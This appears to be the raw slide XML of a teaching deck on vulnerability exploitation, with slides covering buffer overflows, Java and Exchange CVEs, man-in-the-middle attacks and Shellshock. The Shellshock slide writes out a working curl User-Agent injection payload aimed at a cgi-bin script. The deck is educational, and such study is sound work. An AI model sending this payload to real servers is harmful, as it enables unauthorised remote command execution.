              </a:rPr>
              <a:t>Thus, when a user loads the page, their cookie data is sent to the attacker, who might then hijack the session.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Date Placeholder 1">
            <a:extLst>
              <a:ext uri="{C34C3C2E-8175-4ABE-9709-AAA4CDCC1C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537BC87-2BB3-4B97-8D27-D9BC32076090}"/>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B43C7A2F-833D-41E2-B3A3-C445D2EDE502}" type="datetime4">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>November 12, 2025</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle 8">
            <a:extLst>
              <a:ext uri="{44B98E79-ED49-4942-A01F-CD450AC3CA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F7A15DC-7A84-4F6D-8F75-B67517DFFD2A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="253946"/>
            <a:ext cx="4876800"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dirty="0"/>
              <a:t>6. Vulnerability exploitation</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Image 4">
            <a:extLst>
              <a:ext uri="{4F867256-D00C-41A4-98C1-6D4DBDF671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24B698-03D1-4358-A14F-50FA4436EDEC}"/>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41CACCE7-5CC8-4391-9F5D-DC442F60912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760D1464-73E0-46A5-9B6D-C3B7A1477AA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57D0B1-063A-4599-B78C-19528501E176}"/>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Buffer Overflow</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 3">
            <a:extLst>
              <a:ext uri="{ACB5E749-468A-49BB-B00E-678DD590589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689834-1A66-4444-BD4C-B0C3F6D8A1F1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="381000" y="1733550"/>
            <a:ext cx="7553068" cy="2892742"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0">
                <a:latin typeface="Roboto"/>
              </a:rPr>
              <a:t>A buffer overflow overwhelms a memory buffer, potentially crashing the program or executing arbitrary code. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0">
                <a:latin typeface="Roboto"/>
              </a:rPr>
              <a:t>This was a classic exploit path in older Windows systems for privilege escalation. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0">
                <a:latin typeface="Roboto"/>
              </a:rPr>
              <a:t>Attackers might supply crafted input that overwrites a function’s return address with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1">
                <a:latin typeface="Roboto"/>
              </a:rPr>
              <a:t>shell code</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0">
                <a:latin typeface="Roboto"/>
              </a:rPr>
              <a:t>, granting attacker control over the system. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0">
                <a:latin typeface="Roboto"/>
              </a:rPr>
              <a:t>Real-world exploits involve manipulating program stack structures to redirect execution flow.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Date Placeholder 1">
            <a:extLst>
              <a:ext uri="{ADCF0D26-2449-4937-9BB9-3511BCB0F31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02CAA1-1413-41DC-A38F-60B9C85C0872}"/>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20E0BF88-FC31-434C-BA05-33E9018314BA}" type="datetime4">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>November 12, 2025</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle 8">
            <a:extLst>
              <a:ext uri="{53A73F32-2B1D-48E3-B612-67620609DA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C2C5B82-9FD0-4E3E-B25B-E687B663D00C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="253946"/>
            <a:ext cx="4953000"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dirty="0"/>
              <a:t>6. Vulnerability exploitation</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Image 4">
            <a:extLst>
              <a:ext uri="{B2AA2E1F-477D-44B4-9B64-6C200E4C39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F33B54-86CA-40B9-9B2C-819AFE5F6599}"/>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0EA2CBF7-EFA5-4EBC-A318-C39D8332BFF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522AE70C-F3F4-4D77-8348-B59F1F2D9EF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5F201A-1CAC-4672-9C76-B410E9B94E44}"/>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Remote Code Execution via </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>CVE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> Exploits</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 3">
            <a:extLst>
              <a:ext uri="{93D84068-D5D9-4B16-84C7-D6E518A3491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EFFAF0-6E80-4144-98BD-5522EA2A10DB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="381000" y="1733550"/>
            <a:ext cx="7553068" cy="2892742"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Roboto"/>
              </a:rPr>
              <a:t>CVE-2012-1723 (Java </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:latin typeface="Roboto"/>
              </a:rPr>
              <a:t>RCE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Roboto"/>
              </a:rPr>
              <a:t>):</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0">
                <a:latin typeface="Roboto"/>
              </a:rPr>
              <a:t> This Java Runtime Environment flaw allows a rogue Java applet (on a crafted webpage or document) to escape the Java sandbox and run arbitrary code on target systems. The famed “Flashback” Trojan exploited this flaw to infect Apple computers.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Roboto"/>
              </a:rPr>
              <a:t>CVE-2021-34473 (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:latin typeface="Roboto"/>
              </a:rPr>
              <a:t>ProxyShell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Roboto"/>
              </a:rPr>
              <a:t> - Microsoft Exchange):</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0">
                <a:latin typeface="Roboto"/>
              </a:rPr>
              <a:t> Involves chaining multiple vulnerabilities in Exchange Server to bypass authentication and execute code as a privileged user, commonly via exposed port 443. Threat actors deploy web shells after exploitation, gaining persistent access for lateral movement, data theft, or malware installation.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Date Placeholder 1">
            <a:extLst>
              <a:ext uri="{A604B5B7-C9F9-4F75-99D3-9EEA4A7B4E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69937A-B422-4204-8DC4-B0506478CA1E}"/>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E65B074D-1F4F-43C2-A82D-F5D23BF94268}" type="datetime4">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>November 12, 2025</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle 8">
            <a:extLst>
              <a:ext uri="{1487F82E-866F-4C2C-8142-9B823717904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F307A1-0B9B-4442-816F-65A49DA48BA0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="253946"/>
            <a:ext cx="4876800"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dirty="0"/>
              <a:t>6. Vulnerability exploitation</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Image 4">
            <a:extLst>
              <a:ext uri="{A6BAAA14-19DF-43AA-B592-E25C49E661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9A5E275-3332-4BD0-ABDF-F2433B65CBC3}"/>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0A2DC3B7-4CAB-4080-B06C-83662311057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6AF59133-FC9E-47FB-8134-E059689ECB9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C85E2C-C367-46C4-BA43-371C5FECBD36}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="371351" y="1171203"/>
            <a:ext cx="5909452" cy="571500"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Shellshock</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>CVE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>-2014-6271)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 3">
            <a:extLst>
              <a:ext uri="{85C7331A-CD90-402C-A46C-54EE282FF7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F9913C5-D9A7-47D0-AADB-85CA39281045}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="381000" y="1733550"/>
            <a:ext cx="7553068" cy="2892742"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0">
                <a:latin typeface="Roboto"/>
              </a:rPr>
              <a:t>This Bash bug allows attackers to execute commands by injecting malformed environment variables into vulnerable systems that invoke Bash scripts.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" b="0" dirty="0">
              <a:latin typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0">
                <a:latin typeface="Roboto"/>
              </a:rPr>
              <a:t>curl -H </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
              </a:rPr>
              <a:t>"User-Agent: () { :;}; /bin/bash -c 'echo hacked &gt; /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
              </a:rPr>
              <a:t>tmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
              </a:rPr>
              <a:t>/pwned'" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
              </a:rPr>
              <a:t>http://vulnerable-target/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
              </a:rPr>
              <a:t>cgi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
              </a:rPr>
              <a:t>-bin/script.sh</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" b="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg2">
                  <a:lumMod val="50000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
              </a:rPr>
              <a:t>If the underlying script incorrectly invokes Bash, the payload after </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
              </a:rPr>
              <a:t>:;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
              </a:rPr>
              <a:t> gets executed, compromising the server.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Date Placeholder 1">
            <a:extLst>
              <a:ext uri="{AC05F732-DEC5-4106-AAB1-76B3BEFF743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88C8065-BC8D-4F45-8272-387C7BEFFBFB}"/>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46EDB752-A532-436C-889B-0DB7E96675DE}" type="datetime4">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>November 12, 2025</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle 8">
            <a:extLst>
              <a:ext uri="{13AA25BE-B1E1-44CB-8E95-2F32DBCC2BF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14330B-2675-4335-AAED-DE4B88648D5C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="253946"/>
            <a:ext cx="4876800"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dirty="0"/>
              <a:t>6. Vulnerability exploitation</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Image 4">
            <a:extLst>
              <a:ext uri="{1D2CB108-A4CE-4264-A283-FD890E5EF0C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267E1AE-2BE7-4D60-9F8E-A524BC2D1E1D}"/>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DAE6B5DD-C7A9-4CD2-9D10-A80AC8E7D55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0C80273D-44E1-4206-BE8C-C0BC221811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98A717-DBE0-42BB-9887-CC2D2A8B5324}"/>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Man-in-the-Middle (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>MitM</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>) Attacks</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 3">
            <a:extLst>
              <a:ext uri="{A4E15A9D-E86B-47B0-85E9-CF92180467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E78265-FD81-492C-A7B6-8ACE7F975043}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="381000" y="1733550"/>
            <a:ext cx="7553068" cy="2892742"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
                <a:ea typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
                <a:cs typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>An attacker intercepts communication by exploiting insecure network configurations. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
                <a:ea typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
                <a:cs typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>For example, intercepting unencrypted Wi-Fi traffic, using </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
                <a:ea typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
                <a:cs typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>DNS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
                <a:ea typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
                <a:cs typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> spoofing, or hijacking user sessions are common </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
                <a:ea typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
                <a:cs typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>MitM</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
                <a:ea typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
                <a:cs typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> tactics. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
                <a:ea typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
                <a:cs typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>In significant heists like the 2016 Bangladesh Bank incident, social engineering and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
                <a:ea typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
                <a:cs typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>MitM</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
                <a:ea typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
                <a:cs typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> tactics were combined for fraudulent transactions worth $81 million.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Date Placeholder 1">
            <a:extLst>
              <a:ext uri="{73D81E4E-9306-458C-A3A3-A45C13ECAF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EE9B3FA-2F03-4141-81A9-204CCA8079CA}"/>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F80559B6-9776-41D8-86C7-3DF5B19191A5}" type="datetime4">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>November 12, 2025</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle 8">
            <a:extLst>
              <a:ext uri="{817E0678-6CDD-4BA0-A213-1A5E0B4425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4FA6ED-2EAF-4AEE-871A-09100FCDEAAB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="253946"/>
            <a:ext cx="4876800"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dirty="0"/>
              <a:t>6. Vulnerability exploitation</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Image 4">
            <a:extLst>
              <a:ext uri="{F5AB8394-24F8-4B51-BF84-B14F1002EA2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9C41719-E8A1-4E8D-B237-6350231F4054}"/>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8782157B-427B-4DD2-B812-575BDED8601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1">
            <a:extLst>
              <a:ext uri="{C677E51E-3E45-42BE-B84C-652BDCC4804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C8AAF57-797E-460F-9628-7BB3735696AE}"/>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322DB553-D9F6-4179-B440-C497438D7D27}" type="datetime4">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>November 12, 2025</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Rectangle 8">
            <a:extLst>
              <a:ext uri="{3D4AD118-905B-4251-808D-EB2ED70702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B4D1050-C57E-4325-A8B6-CDDBC2B0F66C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="253946"/>
            <a:ext cx="4876800"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dirty="0"/>
              <a:t>6. Vulnerability exploitation</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="5" name="Table 4">
            <a:extLst>
              <a:ext uri="{D4F9954D-F992-4C12-B223-226AC0BBB9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32525F4-8F52-40E8-8D44-232CCC4E3FCA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="723757" y="1171355"/>
          <a:ext cx="7477124" cy="3409825"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" bandRow="1">
                <a:tableStyleId>{CE5C5E43-6BC0-4618-BB44-37CFE357241E}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="1869281">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20000"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1869281">
                  <a:extLst>
